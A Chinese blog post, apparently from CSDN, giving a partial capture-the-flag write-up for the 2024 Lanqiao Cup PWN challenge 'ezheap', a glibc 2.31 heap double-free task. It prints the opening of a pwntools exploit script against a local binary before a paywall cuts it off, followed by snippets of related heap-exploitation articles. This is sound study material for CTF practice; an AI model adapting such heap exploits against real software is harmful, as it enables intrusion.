[蓝桥杯2024]-PWN:ezheap解析(堆glibc2.31,glibc2.31下的double free)

最新推荐文章于 2024-09-23 09:22:25 发布
最新推荐文章于 2024-09-23 09:22:25 发布
阅读量1k 收藏 7
点赞数 15
分类专栏: PWN 文章标签: 蓝桥杯 职场和发展
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_79326813/article/details/138407063
版权

查看保护

查看ida

大致就是只能创建0x60大小的堆块,并且uaf只能利用一次

完整exp:

from pwn import*
#context(log_level='debug')
p=process('./ezheap2.31')

def alloc(content):
    p.sendlineafter(b'4.exit',b'1')
    p.send(content)
def free(index):
    p.sendlineafter(b'4.exit',b'2')
    p.sendline(str(index))
def show(index):
    p.sendlineafter(b'4.exit',b'3')
    p.sendline(str(index))
def uaffree(index):
    p.sendlineafter(b'4.exit',b'2106373')
    p.sendline(str(index))

for i in range(3):
    alloc(b'a')
for i in range(2,0,-1):
    free(i)
alloc(b'a')
show(1)
p.recvuntil(b'a')
最低0.47元/天 解锁文章
glibc2.31下的新double free手法/字节跳动pwn题gun题解
chennbnbnb的博客
12-02 4605
回顾double free手法 在glibc2.27之前,主要是fastbin double free: fastbin在free时只会检查现在释放的chunk,是不是开头的chunk,因此可以通过free(C1), free(C2), free(C1)的手法绕过 并在在fastbin取出时,会检查size字段是不是属于这个fastbin,因此往往需要伪造一个size glibc2.27~glibc2.28,主要是tcache double free 相较于fastbin double fr
pwn-double free
xy_369的博客
05-21 565
指针情况:(只连续free两次xy1不行,有检查机制,中间必须free一个同等大小的chunk才能绕过检查机制,检查机制)一个神奇的现象:xy1 中输入的数据同时也输进了 Top chunk。1、代码及编译指令(运行环境:ubuntu16.04)
glibc 2.31 pwn——house of pig原题分析与示例程序
CoLin的pwn小屋
01-09 1391
house of pig题目解析及演示程序
linux_pwn(2)--double free&&qwb2018_raisepig
azraelxuemo的博客
03-05 1506
文章目录What is double freepwn题例题add函数show函数delete函数开始做题准备框架调试泄露libcdouble freeexp总结 What is double free double free顾名思义,两次释放,在ctf里面一般就是对同一个内存块释放了两次,其实这个跟之前的uaf产生的方式有点类似,都是需要满足指针没有被置NULL ptr=malloc(0x10) ptr2=malloc(0x10) free(ptr) free(ptr2) free(ptr) 由于直接连续
CISCN --EzHeap
A13837377363的博客
05-28 424
思路清晰了,将下一个0x420大小的chunk给free掉,这样fd段就是usbin地址,然后用edit将当前chunk和下一个chunk的size段和pre_size填满,然后show(),就能全都打印出来,就能泄露libc基址了。所以,整体就是:泄露libc基址--->计算出environ地址-->泄露地址--->覆盖fd-->分配到environ-0x200的位置-->泄露栈地址-->覆盖fd-->分配到栈上-->写入rop链。使用的方法是environ泄露栈地址,然后在栈上构造orw的rop链。
一道方向的pwndouble free & unsorted bins)
F_Day_的博客
10-17 1136
一道方向的pwndouble free & unsorted bins)做题环境什么是double free 在某博客上看到了一道的题,博主说是入门的,嗯,那正好适合我,于是我花了一周终于出结果了。。。。。。 来看看我都遇到了什么问题 做题环境 Ubuntu 20.04.3 LTS,这是我在微软商店下载的子系统,也是一切万恶之源的开始 题目:Roc826 什么是double free 希望再次之前,你已经知道什么是了。 double free就是对一个free两次 在中,free
glibc 2.31利用技术深入解析与CTF挑战案例
-glibc 2.31中,tcache结构有所变化,pwngdb可以用来帮助分析这些变化,并对漏洞进行利用。 ### 攻击的防御 1. **编写安全代码**:开发人员应避免常见的安全漏洞,如使用数组边界检查、避免缓冲区溢出等。...
【CTF资料-0x0002PWN简易Linux利用入门教程by arttnba3
arttnba3的博客
02-25 6089
【CTF资料-0x0002】简易Linux利用入门教程by arttnba3老生常谈,[GITHUB BLOG ADDR](https://archive.next.arttnba3.cn/2021/02/24/%E3%80%90CTF%E8%B5%84%E6%96%99-0x0002%E3%80%91%E7%AE%80%E6%98%93Linux%E5%A0%86%E5%88%A9%E7%94%A8%E5%85%A5%E9%97%A8%E6%95%99%E7%A8%8Bby%20arttnba3/),请
ctf-pwn tc和smallbin的doublefree利用
蚁景网安学院
07-15 477
前言:之前曾经有了解过libc.2.31下tc和smallbin的联合利用, 但是那次看到的是malloc与calloc的使用, 所以这次借助TCTF2021的listbook来讲讲2.3...
pwn刷题num46----fast bin double free (控制free chunk的fd指针指向,栈上伪造的fake chunk,修改栈上变量值)
tbsqigongzi的博客
05-03 1124
BUUCTF-PWN-metasequoia_2020_samsara 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 保护全开 动态链接 英文意思 打败魔龙后,你变成了魔龙…… 1. 抓捕一个人 2. 吃掉一个人 3. 煮一个人 4. 找到你的巢穴 5. 转移到另一个王国 6. 自杀 ida看一下伪代码 主函数 还有一个菜单函数 观察分析main函数,switch里case1每次申请chunk大小为0x20(mem为0x10), case
[HNCTF 2022 WEEK4]ezheap
红叶的博客
04-26 1667
手把手教学,覆盖一切途中会遇到的问题。
[pwn]:熟练掌握double free+unlink
Breeze的博客
09-06 9143
double free+unlink 4-ReeHY-main-100 writeup 一道经典的溢出题目4-ReeHY-main-100 题目分析 江湖规矩,先看安全策略: 还可以,没有full relro说明可以修改got表。然后看看程序的逻辑: 一看到菜单基本就是得题目没跑了,然后IDA查看反汇编代码: create函数(我改名后): 整个create函数充斥着符号溢出的味道… 然...
2024ByteCTF-PWN-ezheap
最新发布
2301_79696060的博客
09-23 1127
ByteCTF2024-ezheap
i春秋2020新春战役PWN之document(绕过tcache的double free检测)
seaaseesa的博客
02-27 3288
Document 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,经典的增删改查程序 Delete功能没有清空指针,存在UAF漏洞 Create功能的size不可控 UAF无法修改到*heap处的内容,也就是next指针的值 Create功能最多允许创建7个 题目给我们的glibc版本为2.29,存在tcache机制,且增加了对tcache dou...
easy_heap
JackBoy的博客
12-04 366
easy_heap  题目保护全开,在malloc的时候存在null-by-one漏洞,由于分配的块的大小都是0x100(),所以null-by-one漏洞只会覆盖下个块的prev_inuse标志位为0。一般的利用思路是通过伪造prev_size的大小来构造overlap-chunk为所欲为,但是这种思路在这道题目里行不通,因为malloc在读取内容的时候‘\0’会截断而且块大小是0...
PWN练习---Heap_1
qq_74259765的博客
06-25 1064
pwn--题部分做题的wp
PWN-HEAP】Unlink学习笔记
SWEET0SWAT的博客
09-02 864
题目练习 HITCON2016 bamboobox 反编译情况: 程序分析
pwn_heap(未完待续)
qq_37439229的博客
10-15 532
早上上信安数基,了解了中国剩余定理,就是求同余方程组的解,找时间,用c++复现以下 pwn_heap 在程序运行过程中,可以提供动态分配的内存,允许程序申请大小未知的内存。其实就是程序虚拟地址空间的一块连续的线性区域,它由低地址向高地址方向增长。我们一般称管理的那部分程序为管理器。 malloc malloc 函数返回对应大小字节的内存块的指针。此外,该函数还对一些异常情况进行了处理 当 n=0 时,返回当前系统允许的的最小内存块。 当 n 为负数时,由于在大多数系统上,size_t 是无符号
pwn with glibc heap(利用手册)
weixin_30542079的博客
08-03 755
前言 ​ 对一些有趣的相关的漏洞的利用做一个记录,如有差错,请见谅。 ​ 文中未做说明 均是指 glibc 2.23 ​ 相关引用已在文中进行了标注,如有遗漏,请提醒。 简单源码分析 ​ 本节只是简单跟读了一下 malloc 和 free 的源码, 说的比较简单,很多细节还是要自己拿一份源代码来读。 中的一些数据结构 管理结构 struct malloc_state { mutex_t m...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值